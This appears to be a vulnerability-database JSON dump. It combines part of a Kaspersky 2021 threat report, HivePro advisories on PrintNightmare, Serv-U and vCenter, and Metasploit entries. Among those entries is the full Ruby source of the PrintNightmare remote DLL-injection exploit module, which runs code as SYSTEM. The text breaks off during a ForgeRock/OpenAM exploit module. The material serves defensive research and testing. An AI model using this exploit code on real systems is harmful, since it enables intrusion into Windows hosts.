(MaaS)](<https://encyclopedia.kaspersky.com/glossary/malware-as-a-service-maas/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>) project. Our telemetry shows that, since January 2020, Grandoreiro has mainly attacked victims in Brazil, Mexico, Spain, Portugal and Turkey.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/07/14175031/tetrade_arrest_01.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/07/14175031/tetrade_arrest_01.png>)\n\nMelcoz had been active in Brazil since at least 2018, before expanding overseas. We observed the group attacking assets in Chile in 2018 and, more recently, in Mexico: it's likely that there are victims in other countries too, as some of the targeted banks have international operations. As a rule, the malware uses AutoIt or VBS scripts, added into MSI files, which run malicious DLLs using the DLL-Hijack technique, aiming to bypass security solutions. The malware steals passwords from browsers and from the device's memory, providing remote access to capture internet banking access. It also includes a Bitcoin wallet stealing module. Our telemetry confirms that, since January 2020, Melcoz has been actively targeting Brazil, Chile and Spain, among other countries.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/07/14175038/tetrade_arrest_02.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/07/14175038/tetrade_arrest_02.png>)\n\nSince both malware families are from Brazil, the individuals arrested in Spain are just operators. So, it's likely that the creators of Grandoreiro and Melcoz will continue to develop new malware techniques and recruit new members in their countries of interest.\n\n### Gamers beware\n\nEarlier this year, we discovered an ad in an underground forum for a piece of malware dubbed BloodyStealer by its creators. The malware is designed to steal passwords, cookies, bank card details, browser auto-fill data, device information, screenshots, desktop and client uTorrent files, Bethesda, Epic Games, GOG, Origin, Steam, Telegram, and VimeWorld client sessions and logs.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/11/16141037/bloodystealer-and-gaming-accounts-in-darknet-screen-1-1024x500.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/11/16141037/bloodystealer-and-gaming-accounts-in-darknet-screen-1.png>)\n\n**_The BloodyStealer ad (Source: [https://twitter.com/3xp0rtblog](<https://twitter.com/3xp0rtblog/status/1380087553676697617>))_**\n\nThe authors of the malware, which has hit users in Europe, Latin America and the Asia-Pacific region, have adopted a MaaS distribution model, meaning that anyone can buy it for the modest price of around $10 per month (roughly $40 for a "lifetime license").\n\nOn top of its theft functions, the malware includes tools to thwart analysis. It sends stolen information as a ZIP archive to the C2 (command-and-control) server, which is protected against DDoS (distributed denial of service) attacks. The cybercriminals use either the (quite basic) control panel or Telegram to obtain the data, including gamer accounts.\n\nBloodyStealer is just one of many tools available on the dark web for stealing gamer accounts. Moreover, underground forums often feature ads offering to post a malicious link on a popular website or selling tools to generate phishing pages automatically. Using these tools, cybercriminals can collect, and then try to monetize, a huge amount of credentials. All kinds of offers related to gamer accounts can be found on the dark web.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/11/16141127/bloodystealer-and-gaming-accounts-in-darknet-screen-2-1024x188.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/11/16141127/bloodystealer-and-gaming-accounts-in-darknet-screen-2.png>)\n\nSo-called logs are among the most popular. These are databases containing reams of data for logging into accounts. In their ads, attackers can specify the types of data, the geography of users, the period over which the logs were collected and other details. For example, in the screenshot below, an underground forum member offers an archive with 65,600 records, of which 9,000 are linked to users from the US, and 5,000 to residents of India, Turkey and Canada. The entire archive costs $150 (that's about 0.2 cents per record).\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/11/16141203/bloodystealer-and-gaming-accounts-in-darknet-screen-3-1024x624.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/11/16141203/bloodystealer-and-gaming-accounts-in-darknet-screen-3.png>)\n\nCybercriminals can also use compromised gaming accounts to launder money, distribute phishing links and conduct other illegal business.\n\nYou can read more about gaming threats, including BloodyStealer, [here](<https://securelist.com/game-related-cyberthreats/103675/>) and [here](<https://securelist.com/bloodystealer-and-gaming-assets-for-sale/104319/>).\n\n### Triada Trojan in WhatsApp mod\n\nNot everyone is happy with the official WhatsApp app, turning instead to modified WhatsApp clients for features that the WhatsApp developers haven't yet implemented in the official version. The creators of these mods often embed ads in them. However, their use of third-party ad modules can provide a mechanism for malicious code to be slipped into the app unnoticed.\n\nThis happened recently with FMWhatsApp, a popular WhatsApp mod. In version 16.80.0 the developers used a third-party ad module that includes the Triada Trojan (detected by Kaspersky's mobile antivirus as Trojan.AndroidOS.Triada.ef). This Trojan performs an intermediary function. First, it collects data about the user's device, and then, depending on the information, it downloads one of several other Trojans. You can find a description of the functions that these other Trojans perform in [our analysis of the infected FMWhatsApp mod](<https://securelist.com/triada-trojan-in-whatsapp-mod/103679/>).\n\n### Qakbot banking Trojan\n\nQakBot (aka QBot, QuackBot and Pinkslipbot) is a banking Trojan that was first discovered in 2007, and has been continually maintained and developed since then. It is now one of the leading banking Trojans around the globe. Its main purpose is to steal banking credentials (e.g., logins, passwords, etc.), but it has also acquired functionality allowing it to spy on financial operations, spread itself and install ransomware in order to maximize revenue from compromised organizations.\n\nThe Trojan also includes the ability to log keystrokes, backdoor functionality, and techniques to evade detection. The latter includes virtual environment detection, regular self-updates and cryptor/packer changes. QakBot also tries to protect itself from being analyzed and debugged by experts and automated tools. Another interesting piece of functionality is the ability to steal emails: these are later used by the attackers to send targeted emails to the victims, with the information obtained used to lure victims into opening those emails.\n\nQakBot is known to infect its victims mainly via spam campaigns. In some cases, the emails are delivered with Microsoft Office documents or password-protected archives with documents attached. The documents contain macros and victims are prompted to open the attachments with claims that they contain important information (e.g., an invoice). In some cases, the emails contain links to web pages distributing malicious documents.\n\nHowever, there is another infection vector that involves a malicious QakBot payload being transferred to the victim's machine via other malware on the compromised machine. The initial infection vectors may vary depending on what the threat actors believe has the best chance of success for the targeted organization(s). It's known that various threat actors perform reconnaissance of target organizations beforehand to decide which infection vector is most suitable.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/09/01145837/Qakbot_technical_analysis_01-1024x350.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/09/01145837/Qakbot_technical_analysis_01.png>)\n\nWe analyzed statistics on QakBot attacks collected from our Kaspersky Security Network (KSN), where anonymized data voluntarily provided by Kaspersky users is accumulated and processed. In the first seven months of 2021 our products detected 181,869 attempts to download or run QakBot. This number is lower than the detection number from January to July 2020, though the number of users affected grew by 65% \u2013 from 10,493 in the previous year to 17,316 this year.\n\n_Number of users affected by QakBot attacks from January to July in 2020 and 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/09/01155141/01-en-qakbot.png>))_\n\nYou can read our full analysis [here](<https://securelist.com/qakbot-technical-analysis/103931/>).", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-11-26T12:00:36", "type": "securelist", "title": "IT threat evolution Q3 2021", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675", "CVE-2021-34527", "CVE-2021-40444"], "modified": "2021-11-26T12:00:36", "id": "SECURELIST:86368EF0EA7DAA3D2AB20E0597A62656", "href": "https://securelist.com/it-threat-evolution-q3-2021/104876/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "hivepro": [{"lastseen": "2021-08-23T15:19:10", "description": "#### THREAT LEVEL: Red.\n\nFor a detailed advisory, [download the ](<https://www.hivepro.com/wp-content/uploads/2021/06/TA202120.pdf>)[pdf file here.](<https://www.hivepro.com/wp-content/uploads/2021/07/TA202122.pdf>)\n\nAttackers have been targeting Windows Print Spooler services for almost 2 months now. It started with the vulnerability(CVE-2021-1675) being exploited in the wild. Soon a patch was released for the same. It was after 2 days that Microsoft found out that there exist another vulnerability which gives the attacker an access to execute a code in the victim\u2019s system. This new vulnerability(CVE-2021-34527) has been named as PrintNightmare. An emergency patch has been released by Microsoft for some of the versions and a workflow as been made available for other versions.\n\n#### Vulnerability Details\n\n![](https://www.hivepro.com/wp-content/uploads/2021/07/image-1024x474.png)\n\n#### Patch Links\n\n<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-1675>\n\n<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-34527>\n\n#### References\n\n<https://securelist.com/quick-look-at-cve-2021-1675-cve-2021-34527-aka-printnightmare/103123/>\n\n<https://attackerkb.com/topics/MIHLz4sY3s/cve-2021-34527-printnightmare?referrer=notificationEmail#rapid7-analysis>\n\n<https://www.kaspersky.com/blog/printnightmare-vulnerability/40520/>", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-07-08T13:50:55", "type": "hivepro", "title": "Emergency patches have been released by Microsoft for PrintNightmare", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675", "CVE-2021-34527"], "modified": "2021-07-08T13:50:55", "id": "HIVEPRO:E7E537280075DE5C0B002F1AF44BE1C5", "href": "https://www.hivepro.com/emergency-patches-have-been-released-by-microsoft-for-printnightmare/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-23T15:19:10", "description": "#### THREAT LEVEL: Amber.\n\nFor a detailed advisory, [download the pdf file here](<https://www.hivepro.com/wp-content/uploads/2021/07/TA202125.pdf>).\n\nA zero-day vulnerability (CVE-2021-35211) that impacts the Serv-U Managed File Transfer and Serv-U Secure FTP, is been exploited by multiple threat actors. The PoC of this exploited vulnerability was given to SolarWinds by Microsoft. SolarWinds has released a patch for the same.\n\n#### Vulnerability Details\n\n![](https://www.hivepro.com/wp-content/uploads/2021/07/Screenshot-2021-07-13-165414-1024x186.png)\n\n#### Indicator of Compromise\n\n**Type**| **Value** \n---|--- \nIP Address| 98.176.196.89 \n68.235.178.32 \n208.113.35.58 \n \n#### Patch Link\n\n<https://www.solarwinds.com/trust-center/security-advisories/cve-2021-35211>\n\n#### References\n\n<https://www.rapid7.com/blog/post/2021/07/12/solarwinds-serv-u-ftp-and-managed-file-transfer-cve-2021-35211-what-you-need-to-know/>\n\n<https://thehackernews.com/2021/07/a-new-critical-solarwinds-zero-day.html>", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-07-13T12:50:52", "type": "hivepro", "title": "Threat Actors are actively exploiting a SolarWinds Zero-Day Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-35211"], "modified": "2021-07-13T12:50:52", "id": "HIVEPRO:CFFBC7E8786DCD48596ACB491F713B13", "href": "https://www.hivepro.com/threat-actors-are-actively-exploiting-a-solarwinds-zero-day/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-09-28T21:19:09", "description": "#### THREAT LEVEL: Green.\n\nFor a detailed advisory, [download the pdf file here.](<https://www.hivepro.com/wp-content/uploads/2021/09/TA202136.pdf>)\n\nVMware has issued patches for 19 new vulnerabilities. CVE-2021-22005 is the worst of the lot, defined as "an arbitrary file upload vulnerability in the Analytics service" of the vCenter Server. An attacker with network access to vCenter Server's port 443 might use this flaw to execute code on the server by uploading a specially crafted file. VMware also provides a temporary workaround for individuals who are unable to instantly patch their appliances.\n\n#### Vulnerability Details\n\n![](https://www.hivepro.com/wp-content/uploads/2021/09/1-1.png) ![](https://www.hivepro.com/wp-content/uploads/2021/09/2-1.png) ![](https://www.hivepro.com/wp-content/uploads/2021/09/2-2.png)\n\n#### Patch Link\n\n<https://www.vmware.com/security/advisories/VMSA-2021-0020.html>\n\n#### References\n\n<https://blogs.vmware.com/vsphere/2021/09/vmsa-2021-0020-what-you-need-to-know.html>\n\n<https://www.theregister.com/2021/09/22/vmware_emergency_vcenter_patch_recommendation/>", "cvss3": {}, "published": "2021-09-22T13:29:07", "type": "hivepro", "title": "Drop everything and patch VMware\u2019s vCenter Server Vulnerabilities", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-22005"], "modified": "2021-09-22T13:29:07", "id": "HIVEPRO:7E3F7EBD4701369D6F9E6149BFE03AC8", "href": "https://www.hivepro.com/drop-everything-and-patch-vmwares-vcenter-server-vulnerabilities/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "metasploit": [{"lastseen": "2023-06-24T15:45:01", "description": "The print spooler service can be abused by an authenticated remote attacker to load a DLL through a crafted DCERPC request, resulting in remote code execution as NT AUTHORITY\\SYSTEM. This module uses the MS-RPRN vector which requires the Print Spooler service to be running.\n", "cvss3": {}, "published": "2022-05-16T18:56:46", "type": "metasploit", "title": "Print Spooler Remote DLL Injection", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-1675", "CVE-2021-34527"], "modified": "2022-05-24T13:16:30", "id": "MSF:EXPLOIT-WINDOWS-DCERPC-CVE_2021_1675_PRINTNIGHTMARE-", "href": "https://www.rapid7.com/db/modules/exploit/windows/dcerpc/cve_2021_1675_printnightmare/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'windows_error'\nrequire 'ruby_smb'\nrequire 'ruby_smb/error'\n\nclass MetasploitModule < Msf::Exploit::Remote\n\n prepend Msf::Exploit::Remote::AutoCheck\n include Msf::Exploit::Remote::DCERPC\n include Msf::Exploit::Remote::SMB::Client::Authenticated\n include Msf::Exploit::Remote::SMB::Server::Share\n include Msf::Exploit::Retry\n include Msf::Exploit::EXE\n include Msf::Exploit::Deprecated\n\n moved_from 'auxiliary/admin/dcerpc/cve_2021_1675_printnightmare'\n\n PrintSystem = RubySMB::Dcerpc::PrintSystem\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Print Spooler Remote DLL Injection',\n 'Description' => %q{\n The print spooler service can be abused by an authenticated remote attacker to load a DLL through a crafted\n DCERPC request, resulting in remote code execution as NT AUTHORITY\\SYSTEM. This module uses the MS-RPRN\n vector which requires the Print Spooler service to be running.\n },\n 'Author' => [\n 'Zhiniang Peng', # vulnerability discovery / research\n 'Xuefeng Li', # vulnerability discovery / research\n 'Zhipeng Huo', # vulnerability discovery\n 'Piotr Madej', # vulnerability discovery\n 'Zhang Yunhai', # vulnerability discovery\n 'cube0x0', # PoC\n 'Spencer McIntyre', # metasploit module\n 'Christophe De La Fuente', # metasploit module co-author\n ],\n 'License' => MSF_LICENSE,\n 'DefaultOptions' => {\n 'SRVHOST' => Rex::Socket.source_address\n },\n 'Stance' => Msf::Exploit::Stance::Aggressive,\n 'Targets' => [\n [\n 'Windows', {\n 'Platform' => 'win',\n 'Arch' => [ ARCH_X64, ARCH_X86 ]\n },\n ],\n ],\n 'DisclosureDate' => '2021-06-08',\n 'References' => [\n ['CVE', '2021-1675'],\n ['CVE', '2021-34527'],\n ['URL', 'https://github.com/cube0x0/CVE-2021-1675'],\n ['URL', 'https://web.archive.org/web/20210701042336/https://github.com/afwu/PrintNightmare'],\n ['URL', 'https://github.com/calebstewart/CVE-2021-1675/blob/main/CVE-2021-1675.ps1'],\n ['URL', 'https://github.com/byt3bl33d3r/ItWasAllADream']\n ],\n 'Notes' => {\n 'AKA' => [ 'PrintNightmare' ],\n 'Stability' => [CRASH_SERVICE_DOWN],\n 'Reliability' => [UNRELIABLE_SESSION],\n 'SideEffects' => [\n ARTIFACTS_ON_DISK # the dll will be copied to the remote server\n ]\n }\n )\n )\n\n register_advanced_options(\n [\n OptInt.new('ReconnectTimeout', [ true, 'The timeout in seconds for reconnecting to the named pipe', 10 ])\n ]\n )\n deregister_options('AutoCheck')\n end\n\n def check\n begin\n connect(backend: :ruby_smb)\n rescue Rex::ConnectionError\n return Exploit::CheckCode::Unknown('Failed to connect to the remote service.')\n end\n\n begin\n smb_login\n rescue Rex::Proto::SMB::Exceptions::LoginError\n return Exploit::CheckCode::Unknown('Failed to authenticate to the remote service.')\n end\n\n begin\n dcerpc_bind_spoolss\n rescue RubySMB::Error::UnexpectedStatusCode => e\n nt_status = ::WindowsError::NTStatus.find_by_retval(e.status_code.value).first\n if nt_status == ::WindowsError::NTStatus::STATUS_OBJECT_NAME_NOT_FOUND\n print_error(\"The 'Print Spooler' service is disabled.\")\n end\n return Exploit::CheckCode::Safe(\"The DCERPC bind failed with error #{nt_status.name} (#{nt_status.description}).\")\n end\n\n @target_arch = dcerpc_getarch\n # see: https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/e81cbc09-ab05-4a32-ae4a-8ec57b436c43\n if @target_arch == ARCH_X64\n @environment = 'Windows x64'\n elsif @target_arch == ARCH_X86\n @environment = 'Windows NT x86'\n else\n return Exploit::CheckCode::Detected('Successfully bound to the remote service.')\n end\n\n print_status(\"Target environment: Windows v#{simple.client.os_version} (#{@target_arch})\")\n\n print_status('Enumerating the installed printer drivers...')\n drivers = enum_printer_drivers(@environment)\n @driver_path = \"#{drivers.driver_path.rpartition('\\\\').first}\\\\UNIDRV.DLL\"\n vprint_status(\"Using driver path: #{@driver_path}\")\n\n print_status('Retrieving the path of the printer driver directory...')\n @config_directory = get_printer_driver_directory(@environment)\n vprint_status(\"Using driver directory: #{@config_directory}\") unless @config_directory.nil?\n\n container = driver_container(\n p_config_file: 'C:\\\\Windows\\\\System32\\\\kernel32.dll',\n p_data_file: \"\\\\??\\\\UNC\\\\127.0.0.1\\\\#{Rex::Text.rand_text_alphanumeric(4..8)}\\\\#{Rex::Text.rand_text_alphanumeric(4..8)}.dll\"\n )\n\n case add_printer_driver_ex(container)\n when nil # prevent the module from erroring out in case the response can't be mapped to a Win32 error code\n return Exploit::CheckCode::Unknown('Received unknown status code, implying the target is not vulnerable.')\n when ::WindowsError::Win32::ERROR_PATH_NOT_FOUND\n return Exploit::CheckCode::Vulnerable('Received ERROR_PATH_NOT_FOUND, implying the target is vulnerable.')\n when ::WindowsError::Win32::ERROR_BAD_NET_NAME\n return Exploit::CheckCode::Vulnerable('Received ERROR_BAD_NET_NAME, implying the target is vulnerable.')\n when ::WindowsError::Win32::ERROR_ACCESS_DENIED\n return Exploit::CheckCode::Safe('Received ERROR_ACCESS_DENIED implying the target is patched.')\n end\n\n Exploit::CheckCode::Detected('Successfully bound to the remote service.')\n end\n\n def run\n fail_with(Failure::BadConfig, 'Can not use an x64 payload on an x86 target.') if @target_arch == ARCH_X86 && payload.arch.first == ARCH_X64\n fail_with(Failure::NoTarget, 'Only x86 and x64 targets are supported.') if @environment.nil?\n fail_with(Failure::Unknown, 'Failed to enumerate the driver directory.') if @config_directory.nil?\n\n super\n end\n\n def setup\n if Rex::Socket.is_ip_addr?(datastore['SRVHOST']) && Rex::Socket.addr_atoi(datastore['SRVHOST']) == 0\n fail_with(Exploit::Failure::BadConfig, 'The SRVHOST option must be set to a routable IP address.')\n end\n\n super\n end\n\n def start_service\n file_name << '.dll'\n self.file_contents = generate_payload_dll\n\n super\n end\n\n def primer\n dll_path = unc\n if dll_path =~ /^\\\\\\\\([\\w:.\\[\\]]+)\\\\(.*)$/\n # targets patched for CVE-2021-34527 (but with Point and Print enabled) need to use this path style as a bypass\n # otherwise the operation will fail with ERROR_INVALID_PARAMETER\n dll_path = \"\\\\??\\\\UNC\\\\#{Regexp.last_match(1)}\\\\#{Regexp.last_match(2)}\"\n end\n vprint_status(\"Using DLL path: #{dll_path}\")\n\n filename = dll_path.rpartition('\\\\').last\n container = driver_container(p_config_file: 'C:\\\\Windows\\\\System32\\\\kernel32.dll', p_data_file: dll_path)\n\n 3.times do\n add_printer_driver_ex(container)\n end\n\n 1.upto(3) do |directory|\n container.driver_info.p_config_file.assign(\"#{@config_directory}\\\\3\\\\old\\\\#{directory}\\\\#{filename}\")\n break if add_printer_driver_ex(container).nil?\n end\n\n cleanup_service\n end\n\n def driver_container(**kwargs)\n PrintSystem::DriverContainer.new(\n level: 2,\n tag: 2,\n driver_info: PrintSystem::DriverInfo2.new(\n c_version: 3,\n p_name_ref_id: 0x00020000,\n p_environment_ref_id: 0x00020004,\n p_driver_path_ref_id: 0x00020008,\n p_data_file_ref_id: 0x0002000c,\n p_config_file_ref_id: 0x00020010,\n # https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/4464eaf0-f34f-40d5-b970-736437a21913\n p_name: \"#{Rex::Text.rand_text_alpha_upper(2..4)} #{Rex::Text.rand_text_numeric(2..3)}\",\n p_environment: @environment,\n p_driver_path: @driver_path,\n **kwargs\n )\n )\n end\n\n def dcerpc_bind_spoolss\n handle = dcerpc_handle(PrintSystem::UUID, '1.0', 'ncacn_np', ['\\\\spoolss'])\n vprint_status(\"Binding to #{handle} ...\")\n dcerpc_bind(handle)\n vprint_status(\"Bound to #{handle} ...\")\n end\n\n def enum_printer_drivers(environment)\n response = rprn_call('RpcEnumPrinterDrivers', p_environment: environment, level: 2)\n response = rprn_call('RpcEnumPrinterDrivers', p_environment: environment, level: 2, p_drivers: [0] * response.pcb_needed, cb_buf: response.pcb_needed)\n fail_with(Failure::UnexpectedReply, 'Failed to enumerate printer drivers.') unless response.p_drivers&.length\n DriverInfo2.read(response.p_drivers.map(&:chr).join)\n end\n\n def get_printer_driver_directory(environment)\n response = rprn_call('RpcGetPrinterDriverDirectory', p_environment: environment, level: 2)\n response = rprn_call('RpcGetPrinterDriverDirectory', p_environment: environment, level: 2, p_driver_directory: [0] * response.pcb_needed, cb_buf: response.pcb_needed)\n fail_with(Failure::UnexpectedReply, 'Failed to obtain the printer driver directory.') unless response.p_driver_directory&.length\n RubySMB::Field::Stringz16.read(response.p_driver_directory.map(&:chr).join).encode('ASCII-8BIT')\n end\n\n def add_printer_driver_ex(container)\n flags = PrintSystem::APD_INSTALL_WARNED_DRIVER | PrintSystem::APD_COPY_FROM_DIRECTORY | PrintSystem::APD_COPY_ALL_FILES\n\n begin\n response = rprn_call('RpcAddPrinterDriverEx', p_name: \"\\\\\\\\#{datastore['RHOST']}\", p_driver_container: container, dw_file_copy_flags: flags)\n rescue RubySMB::Error::UnexpectedStatusCode => e\n nt_status = ::WindowsError::NTStatus.find_by_retval(e.status_code.value).first\n message = \"Error #{nt_status.name} (#{nt_status.description})\"\n if nt_status == ::WindowsError::NTStatus::STATUS_PIPE_BROKEN\n # STATUS_PIPE_BROKEN is the return value when the payload is executed, so this is somewhat expected\n print_status('The named pipe connection was broken, reconnecting...')\n reconnected = retry_until_truthy(timeout: datastore['ReconnectTimeout'].to_i) do\n dcerpc_bind_spoolss\n rescue RubySMB::Error::CommunicationError, RubySMB::Error::UnexpectedStatusCode => e\n false\n else\n true\n end\n\n unless reconnected\n vprint_status('Failed to reconnect to the named pipe.')\n return nil\n end\n\n print_status('Successfully reconnected to the named pipe.')\n retry\n else\n print_error(message)\n end\n\n return nt_status\n end\n\n error = ::WindowsError::Win32.find_by_retval(response.error_status.value).first\n message = \"RpcAddPrinterDriverEx response #{response.error_status}\"\n message << \" #{error.name} (#{error.description})\" unless error.nil?\n vprint_status(message)\n error\n end\n\n def rprn_call(name, **kwargs)\n request = PrintSystem.const_get(\"#{name}Request\").new(**kwargs)\n\n begin\n raw_response = dcerpc.call(request.opnum, request.to_binary_s)\n rescue Rex::Proto::DCERPC::Exceptions::Fault => e\n fail_with(Failure::UnexpectedReply, \"The #{name} Print System RPC request failed (#{e.message}).\")\n end\n\n PrintSystem.const_get(\"#{name}Response\").read(raw_response)\n end\n\n class DriverInfo2Header < BinData::Record\n endian :little\n\n uint32 :c_version\n uint32 :name_offset\n uint32 :environment_offset\n uint32 :driver_path_offset\n uint32 :data_file_offset\n uint32 :config_file_offset\n end\n\n # this is a partial implementation that just parses the data, this is *not* the same struct as PrintSystem::DriverInfo2\n # see: https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/2825d22e-c5a5-47cd-a216-3e903fd6e030\n DriverInfo2 = Struct.new(:header, :name, :environment, :driver_path, :data_file, :config_file) do\n def self.read(data)\n header = DriverInfo2Header.read(data)\n new(\n header,\n RubySMB::Field::Stringz16.read(data[header.name_offset..]).encode('ASCII-8BIT'),\n RubySMB::Field::Stringz16.read(data[header.environment_offset..]).encode('ASCII-8BIT'),\n RubySMB::Field::Stringz16.read(data[header.driver_path_offset..]).encode('ASCII-8BIT'),\n RubySMB::Field::Stringz16.read(data[header.data_file_offset..]).encode('ASCII-8BIT'),\n RubySMB::Field::Stringz16.read(data[header.config_file_offset..]).encode('ASCII-8BIT')\n )\n end\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/dcerpc/cve_2021_1675_printnightmare.rb", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-02-09T16:06:09", "description": "This module leverages a pre-authentication remote code execution vulnerability in the OpenAM identity and access management solution. The vulnerability arises from a Java deserialization flaw in OpenAM\u2019s implementation of the Jato framework and can be triggered by a simple one-line GET or POST request to a vulnerable endpoint. Successful exploitation yields code execution on the target system as the service user. This vulnerability also affects the ForgeRock identity platform which is built on top of OpenAM and is thus is susceptible to the same issue.\n", "cvss3": {}, "published": "2021-07-02T21:05:39", "type": "metasploit", "title": "ForgeRock / OpenAM Jato Java Deserialization", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-35464"], "modified": "2023-02-08T15:20:32", "id": "MSF:EXPLOIT-MULTI-HTTP-CVE_2021_35464_FORGEROCK_OPENAM-", "href": "https://www.rapid7.com/db/modules/exploit/multi/http/cve_2021_35464_forgerock_openam/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n prepend Msf::Exploit::Remote::AutoCheck\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::CmdStager\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'ForgeRock / OpenAM Jato Java Deserialization',\n 'Description' => %q{\n This module leverages a pre-authentication remote code execution vulnerability in the OpenAM identity and\n access management solution. The vulnerability arises from a Java deserialization flaw in OpenAM\u2019s\n implementation of the Jato framework and can be triggered by a simple one-line GET or POST request to a\n vulnerable endpoint. Successful exploitation yields code execution on the target system as the service user.\n\n This vulnerability also affects the ForgeRock identity platform which is built on top of OpenAM and is thus\n is susceptible to the same issue.\n },\n 'Author' => [\n 'Michael Stepankin', # Original Discovery and PoC\n 'bwatters-r7', # Msf module\n 'Spencer McIntyre', # All of the Help\n 'jheysel-r7' # Check Method\n ],\n 'References' => [\n ['CVE', '2021-35464'],\n ['URL', 'https://portswigger.net/research/pre-auth-rce-in-forgerock-openam-cve-2021-35464'],\n ['URL', 'https://backstage.forgerock.com/knowledge/kb/article/a47894244']\n ],\n 'DisclosureDate' => '2021-06-29',\n 'License' => MSF_LICENSE,\n 'Platform' => ['unix', 'linux'],\n 'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],\n 'Privileged' => false,\n 'Targets' => [\n [\n 'Unix Command',\n {\n 'Platform' => 'unix',\n 'Arch' => 